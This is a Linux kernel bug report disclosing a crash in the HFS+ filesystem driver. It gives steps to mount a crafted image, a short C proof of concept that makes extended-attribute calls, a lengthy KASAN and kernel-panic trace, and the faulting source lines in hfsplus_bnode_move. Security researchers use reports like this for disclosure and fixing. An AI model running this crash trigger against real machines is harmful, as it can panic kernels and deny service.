Created attachment 276891 [details] The (compressed) crafted image which causes crash - Reproduce # mkdir mnt # mount -t hfsplus 81.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); listxattr(xattr, buf2, sizeof(buf2)); removexattr(xattr, "user.mime_type"); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 178.302459] ================================================================== [ 178.304073] BUG: KASAN: wild-memory-access in hfsplus_bnode_move+0x1a4/0x660 [ 178.305510] Read of size 18446744073709551602 at addr 000508000000100e by task a.out/1364 [ 178.307485] CPU: 0 PID: 1364 Comm: a.out Not tainted 4.18.0-rc1+ #6 [ 178.307488] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 178.307494] Call Trace: [ 178.307532] dump_stack+0x7b/0xb5 [ 178.307568] kasan_report+0x10c/0x390 [ 178.307573] ? hfsplus_bnode_move+0x1a4/0x660 [ 178.307590] check_memory_region+0x139/0x190 [ 178.307595] memmove+0x23/0x50 [ 178.307600] hfsplus_bnode_move+0x1a4/0x660 [ 178.307606] hfsplus_brec_insert+0x371/0x6c0 [ 178.307612] ? hfsplus_brec_keylen+0x130/0x130 [ 178.307617] ? __kmalloc+0x11f/0x240 [ 178.307623] hfsplus_create_attr+0x263/0x2b0 [ 178.307628] ? hfsplus_attr_exists+0x140/0x140 [ 178.307636] ? 
strncmp+0x3d/0xc0 [ 178.307641] __hfsplus_setxattr+0x2d5/0x1160 [ 178.307672] ? unwind_get_return_address+0x36/0x50 [ 178.307678] ? kasan_check_write+0x14/0x20 [ 178.307693] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 178.307700] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 178.307705] ? save_stack+0x46/0xd0 [ 178.307708] ? kasan_kmalloc+0xad/0xe0 [ 178.307712] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.307717] ? hfsplus_setxattr+0x4c/0xb0 [ 178.307720] ? hfsplus_user_setxattr+0x27/0x30 [ 178.307733] ? __vfs_setxattr+0x7c/0xa0 [ 178.307738] ? __vfs_setxattr_noperm+0x8d/0x200 [ 178.307741] ? vfs_setxattr+0xb3/0xc0 [ 178.307745] ? setxattr+0x1b3/0x260 [ 178.307748] ? path_setxattr+0x134/0x170 [ 178.307752] ? __x64_sys_setxattr+0x6d/0x80 [ 178.307766] ? do_syscall_64+0x78/0x170 [ 178.307771] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.307777] ? save_stack+0xb5/0xd0 [ 178.307780] ? save_stack+0x46/0xd0 [ 178.307783] ? kasan_kmalloc+0xad/0xe0 [ 178.307791] ? __kmalloc_node+0x11e/0x2e0 [ 178.307807] ? kvmalloc_node+0x31/0x80 [ 178.307811] ? setxattr+0x114/0x260 [ 178.307815] ? path_setxattr+0x134/0x170 [ 178.307819] ? __x64_sys_setxattr+0x6d/0x80 [ 178.307822] ? do_syscall_64+0x78/0x170 [ 178.307827] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.307831] ? save_stack+0xb5/0xd0 [ 178.307834] ? save_stack+0x46/0xd0 [ 178.307838] ? __kasan_slab_free+0x13c/0x1a0 [ 178.307841] ? kasan_slab_free+0xe/0x10 [ 178.307845] ? kmem_cache_free+0x89/0x1e0 [ 178.307854] ? putname+0x80/0x90 [ 178.307858] ? filename_lookup+0x191/0x280 [ 178.307862] ? kasan_unpoison_shadow+0x36/0x50 [ 178.307866] ? kasan_kmalloc+0xad/0xe0 [ 178.307871] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.307877] hfsplus_setxattr+0x8a/0xb0 [ 178.307881] hfsplus_user_setxattr+0x27/0x30 [ 178.307885] __vfs_setxattr+0x7c/0xa0 [ 178.307890] __vfs_setxattr_noperm+0x8d/0x200 [ 178.307894] vfs_setxattr+0xb3/0xc0 [ 178.307898] setxattr+0x1b3/0x260 [ 178.307902] ? vfs_setxattr+0xc0/0xc0 [ 178.307906] ? 
filename_lookup+0x191/0x280 [ 178.307910] ? filename_parentat+0x2b0/0x2b0 [ 178.307914] ? kasan_kmalloc+0xad/0xe0 [ 178.307919] ? kasan_check_write+0x14/0x20 [ 178.307942] ? strncpy_from_user+0xa8/0x1c0 [ 178.307954] ? __mnt_is_readonly.part.13+0x23/0x30 [ 178.307960] ? __mnt_want_write+0x9d/0xb0 [ 178.307964] path_setxattr+0x134/0x170 [ 178.307969] ? setxattr+0x260/0x260 [ 178.307978] ? vm_brk+0x20/0x20 [ 178.307984] __x64_sys_setxattr+0x6d/0x80 [ 178.307988] do_syscall_64+0x78/0x170 [ 178.307994] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.308016] RIP: 0033:0x7f73a2b2c1fa [ 178.308017] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 178.308078] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 178.308087] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa [ 178.308090] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080 [ 178.308092] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000 [ 178.308095] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 178.308097] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000 [ 178.308102] ================================================================== [ 178.309572] Disabling lock debugging due to kernel taint [ 178.309830] general protection fault: 0000 [#1] SMP KASAN PTI [ 178.311012] CPU: 0 PID: 1364 Comm: a.out Tainted: G B 4.18.0-rc1+ #6 [ 178.312569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 178.314462] RIP: 0010:__memmove+0x3d/0x1a0 [ 178.315292] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f [ 178.319037] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286 [ 178.320083] 
RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54 [ 178.322245] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae [ 178.323686] RBP: ffff8801f243f548 R08: ffffed003a337e01 R09: ffffed003a328414 [ 178.325139] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae [ 178.326571] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348 [ 178.328004] FS: 00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 178.329647] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 178.330809] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0 [ 178.341180] Call Trace: [ 178.342118] ? memmove+0x45/0x50 [ 178.343186] hfsplus_bnode_move+0x1a4/0x660 [ 178.344051] hfsplus_brec_insert+0x371/0x6c0 [ 178.344946] ? hfsplus_brec_keylen+0x130/0x130 [ 178.345858] ? __kmalloc+0x11f/0x240 [ 178.346609] hfsplus_create_attr+0x263/0x2b0 [ 178.347488] ? hfsplus_attr_exists+0x140/0x140 [ 178.348418] ? strncmp+0x3d/0xc0 [ 178.349091] __hfsplus_setxattr+0x2d5/0x1160 [ 178.349970] ? unwind_get_return_address+0x36/0x50 [ 178.350952] ? kasan_check_write+0x14/0x20 [ 178.351795] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 178.353173] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 178.354364] ? save_stack+0x46/0xd0 [ 178.355088] ? kasan_kmalloc+0xad/0xe0 [ 178.355862] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.356842] ? hfsplus_setxattr+0x4c/0xb0 [ 178.357671] ? hfsplus_user_setxattr+0x27/0x30 [ 178.358845] ? __vfs_setxattr+0x7c/0xa0 [ 178.359639] ? __vfs_setxattr_noperm+0x8d/0x200 [ 178.360683] ? vfs_setxattr+0xb3/0xc0 [ 178.361706] ? setxattr+0x1b3/0x260 [ 178.362432] ? path_setxattr+0x134/0x170 [ 178.363241] ? __x64_sys_setxattr+0x6d/0x80 [ 178.364099] ? do_syscall_64+0x78/0x170 [ 178.365000] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.366063] ? save_stack+0xb5/0xd0 [ 178.366786] ? save_stack+0x46/0xd0 [ 178.367503] ? kasan_kmalloc+0xad/0xe0 [ 178.368386] ? __kmalloc_node+0x11e/0x2e0 [ 178.369208] ? 
kvmalloc_node+0x31/0x80 [ 178.369979] ? setxattr+0x114/0x260 [ 178.370698] ? path_setxattr+0x134/0x170 [ 178.371504] ? __x64_sys_setxattr+0x6d/0x80 [ 178.372472] ? do_syscall_64+0x78/0x170 [ 178.373261] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.374318] ? save_stack+0xb5/0xd0 [ 178.375036] ? save_stack+0x46/0xd0 [ 178.375753] ? __kasan_slab_free+0x13c/0x1a0 [ 178.376636] ? kasan_slab_free+0xe/0x10 [ 178.377424] ? kmem_cache_free+0x89/0x1e0 [ 178.378245] ? putname+0x80/0x90 [ 178.378913] ? filename_lookup+0x191/0x280 [ 178.379750] ? kasan_unpoison_shadow+0x36/0x50 [ 178.380762] ? kasan_kmalloc+0xad/0xe0 [ 178.381532] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.382490] hfsplus_setxattr+0x8a/0xb0 [ 178.383276] hfsplus_user_setxattr+0x27/0x30 [ 178.384256] __vfs_setxattr+0x7c/0xa0 [ 178.385009] __vfs_setxattr_noperm+0x8d/0x200 [ 178.385896] vfs_setxattr+0xb3/0xc0 [ 178.386614] setxattr+0x1b3/0x260 [ 178.387296] ? vfs_setxattr+0xc0/0xc0 [ 178.388044] ? filename_lookup+0x191/0x280 [ 178.388894] ? filename_parentat+0x2b0/0x2b0 [ 178.389767] ? kasan_kmalloc+0xad/0xe0 [ 178.390540] ? kasan_check_write+0x14/0x20 [ 178.391379] ? strncpy_from_user+0xa8/0x1c0 [ 178.392250] ? __mnt_is_readonly.part.13+0x23/0x30 [ 178.393228] ? __mnt_want_write+0x9d/0xb0 [ 178.394054] path_setxattr+0x134/0x170 [ 178.394822] ? setxattr+0x260/0x260 [ 178.395543] ? 
vm_brk+0x20/0x20 [ 178.396207] __x64_sys_setxattr+0x6d/0x80 [ 178.397031] do_syscall_64+0x78/0x170 [ 178.397791] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.398820] RIP: 0033:0x7f73a2b2c1fa [ 178.399552] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 178.403344] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 178.404860] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa [ 178.406278] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080 [ 178.407698] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000 [ 178.409124] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 178.410533] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000 [ 178.411951] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 178.421820] ---[ end trace 7f5a46c7478f1295 ]--- [ 178.422779] RIP: 0010:__memmove+0x3d/0x1a0 [ 178.423609] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f [ 178.427440] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286 [ 178.428652] RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54 [ 178.430077] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae [ 178.431488] RBP: ffff8801f243f548 
R08: ffffed003a337e01 R09: ffffed003a328414 [ 178.432950] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae [ 178.434376] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348 [ 178.435793] FS: 00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 178.437444] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 178.438593] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0
- Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L205
while (src < len) {
    memmove(kmap(*dst_page), kmap(*src_page), src);
    kunmap(*src_page);
    set_page_dirty(*dst_page);
    kunmap(*dst_page);
    len -= src;
    src = PAGE_SIZE;
    src_page--;
    dst_page--;
}
memmove() reads from a wild address, which leads to a kernel panic. The KASAN-reported read size 18446744073709551602 is 2^64 - 14 (RBX holds fffffffffffffff2 in the register dump), i.e. the move length has wrapped negative; since the only input is the crafted image, the length presumably derives from on-disk b-tree node metadata that is not validated before being passed to memmove(). Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.